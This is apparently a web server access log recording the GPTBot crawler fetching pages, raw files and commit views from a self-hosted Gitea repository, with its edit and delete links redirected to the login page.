"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11957] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:17:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:17:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:17:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:17:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake" +[17/Feb/2026:17:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14323] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11349] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:25:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35741] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10003] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13441] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10262] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:17:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:17:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:17:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46762] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:17:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:17:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13536] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:17:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:17:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:17:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:17:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11967] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16318] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:17:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2fcontroller-cpp.md" [Client 74.7.227.38] [Length 17392] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" +[17/Feb/2026:17:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2fcontroller-cpp.md" [Client 74.7.227.38] [Length 22226] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" +[17/Feb/2026:17:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" +[17/Feb/2026:17:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py?display=source" [Client 74.7.227.38] [Length 18056] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" +[17/Feb/2026:17:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 11996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" +[17/Feb/2026:17:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 